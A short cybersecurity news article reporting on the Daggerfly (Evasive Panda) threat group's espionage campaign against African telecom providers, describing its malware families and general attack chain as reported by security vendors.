A China-linked threat actor has launched a new campaign against telecommunication services providers in Africa since November 2022. The hacking group, identified by Symantec as Daggerfly and known as Bronze Highland and Evasive Panda, utilizes previously unseen plugins from the MgBot malware framework to conduct its operations. The attackers also use a PlugX loader and abuse the legitimate AnyDesk remote desktop software in their operations.
Using MgBot by Daggerfly to target African telecommunications service providers is not new. Malwarebytes had previously reported the group’s use of MgBot in phishing attacks aimed at Indian government personnel and individuals in Hong Kong, with the report being published in July 2020.
To infect their targets, the group uses spear-phishing as an initial attack vector, employing MgBot, Cobalt Strike, and KsRemote, a remote access trojan (RAT) for Android. Some analyses suggest that Daggerfly may have engaged in espionage activities against domestic human rights, pro-democracy advocates, and neighbouring nations since 2014. Secureworks revealed this in one of the statements on the hackers’ operations.
The attack chain analyzed by Symantec reveals the use of living-off-the-land (LotL) tools like BITSAdmin and PowerShell to deliver next-stage payloads, including AnyDesk executable and a credential harvesting utility. The threat actor then creates a local account to set up persistence on the victim system and deploys the MgBot modular framework, which has a broad range of plugins to capture sensitive information.
SentinelOne recently reported on a cyber espionage campaign in Q1 2023, dubbed “Tainted Love,” which targeted telecommunication providers in the Middle East and was attributed to a Chinese group. Following this, Symantec discovered three more victims of the same activity cluster in Asia and Africa. Among the victims, two were subsidiaries of a telecom company in the Middle East, which were breached in November 2022. Symantec has cautioned that telecommunication companies may remain a prime target in intelligence-gathering operations due to the potential access they offer to end-users communications.
